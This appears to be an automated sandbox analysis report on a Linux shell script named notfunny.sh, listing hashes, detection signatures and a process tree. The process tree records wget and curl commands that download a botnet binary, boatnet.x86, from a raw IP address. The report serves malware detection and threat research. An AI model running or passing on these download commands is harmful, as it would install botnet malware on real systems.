Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28/10/2024, 01:18

General

  • Target

    notfunny.sh

  • Size

    3KB

  • MD5

    fc73d6be8e91e575c902e5d3b1834868

  • SHA1

    61880a4da8b19dc7d4d87b5a3d55e0a992aac856

  • SHA256

    9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

  • SHA512

    1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3

Score
5/10

Malware Config

Signatures

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/notfunny.sh
    /tmp/notfunny.sh
    1⤵
      PID:704
      • /usr/bin/wget
        wget http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Writes file to tmp directory
        PID:708
      • /usr/bin/curl
        curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:809

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/boatnet.x86

      Filesize

      30KB

      MD5

      8833728bd41c20fb14e6075a9cdd8afc

      SHA1

      9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa

      SHA256

      ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671

      SHA512

      58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48